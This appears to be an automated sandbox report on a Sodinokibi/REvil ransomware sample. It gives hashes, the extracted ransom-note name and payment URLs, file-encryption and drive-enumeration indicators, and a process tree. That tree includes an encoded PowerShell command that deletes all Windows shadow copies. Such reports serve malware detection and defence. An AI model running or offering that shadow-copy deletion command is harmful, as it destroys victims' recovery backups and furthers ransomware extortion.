Analysis
-
max time kernel
155s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
25-06-2022 11:53
Static task
static1
Behavioral task
behavioral1
Sample
3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe
Resource
win10v2004-20220414-en
General
-
Target
3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe
-
Size
181KB
-
MD5
e4b1080192b24298d08227ccbab1a24b
-
SHA1
e96a57d26930d96c7e3a2964fc1ede83e6bae4f1
-
SHA256
3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86
-
SHA512
345be5d595d2f0ccef1977e9263dfdcc6773195becb84d9786e4868cf5a30a6a71c37aac9f4e1db4b8bdea7aafb5fa4cc909e0ad54f0f8cf198be8c27f75b37d
Malware Config
Extracted
C:\crbi5bgbk-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FE14E7541D09A399
http://decryptor.top/FE14E7541D09A399
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exedescription ioc process File renamed C:\Users\Admin\Pictures\PushExpand.png => \??\c:\users\admin\pictures\PushExpand.png.crbi5bgbk 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\users\admin\pictures\RequestTest.tiff 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File renamed C:\Users\Admin\Pictures\RequestTest.tiff => \??\c:\users\admin\pictures\RequestTest.tiff.crbi5bgbk 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File renamed C:\Users\Admin\Pictures\SelectBackup.tif => \??\c:\users\admin\pictures\SelectBackup.tif.crbi5bgbk 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File renamed C:\Users\Admin\Pictures\EnterUnprotect.tif => \??\c:\users\admin\pictures\EnterUnprotect.tif.crbi5bgbk 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File renamed C:\Users\Admin\Pictures\JoinMount.tiff => \??\c:\users\admin\pictures\JoinMount.tiff.crbi5bgbk 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File renamed C:\Users\Admin\Pictures\MountAssert.raw => \??\c:\users\admin\pictures\MountAssert.raw.crbi5bgbk 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File renamed C:\Users\Admin\Pictures\PopNew.tif => \??\c:\users\admin\pictures\PopNew.tif.crbi5bgbk 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File renamed C:\Users\Admin\Pictures\ConvertToReset.raw => \??\c:\users\admin\pictures\ConvertToReset.raw.crbi5bgbk 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\users\admin\pictures\JoinMount.tiff 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File renamed C:\Users\Admin\Pictures\MountTrace.tif => \??\c:\users\admin\pictures\MountTrace.tif.crbi5bgbk 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File renamed C:\Users\Admin\Pictures\SuspendHide.raw => \??\c:\users\admin\pictures\SuspendHide.raw.crbi5bgbk 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exedescription ioc process File opened (read-only) \??\J: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\Q: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\S: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\U: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\W: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\B: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\E: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\H: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\D: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\K: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\L: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\M: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\P: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\V: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\F: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\G: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\I: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\Y: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\Z: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\A: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\O: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\X: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\N: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\R: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened (read-only) \??\T: 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\09t18808p.bmp" 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe -
Drops file in Program Files directory 32 IoCs
Processes:
3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exedescription ioc process File opened for modification \??\c:\program files\RemoveTrace.txt 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\UnregisterExport.xla 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\UpdateExport.mpv2 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\WriteStart.au 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\DisconnectSend.rtf 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\OptimizeGrant.xlsx 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\PopWatch.xlsx 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\WatchDismount.3g2 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File created \??\c:\program files (x86)\crbi5bgbk-readme.txt 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\CompressJoin.htm 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\RegisterExport.mht 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\ResumeRestart.js 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\StepEnable.inf 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\EnableDisable.xsl 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\GroupOptimize.dxf 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\RegisterDisable.xsl 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\InvokeClear.eps 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\LockEdit.odp 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\UnprotectComplete.html 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\GrantStart.3gp2 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\RegisterJoin.jpe 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\RestartMeasure.pps 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\ResumeMove.emf 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\CompareApprove.png 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\ResizeUpdate.jpg 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\DebugAdd.vsdx 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\ExportUpdate.m4a 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\ReadWrite.ADTS 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File created \??\c:\program files\crbi5bgbk-readme.txt 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\CompressCheckpoint.gif 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\LimitBlock.vb 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe File opened for modification \??\c:\program files\ProtectUnprotect.vb 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exepowershell.exepid process 5092 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe 5092 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe 1712 powershell.exe 1712 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 5092 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeBackupPrivilege 1012 vssvc.exe Token: SeRestorePrivilege 1012 vssvc.exe Token: SeAuditPrivilege 1012 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exedescription pid process target process PID 5092 wrote to memory of 1712 5092 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe powershell.exe PID 5092 wrote to memory of 1712 5092 3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe"C:\Users\Admin\AppData\Local\Temp\3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1404
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1012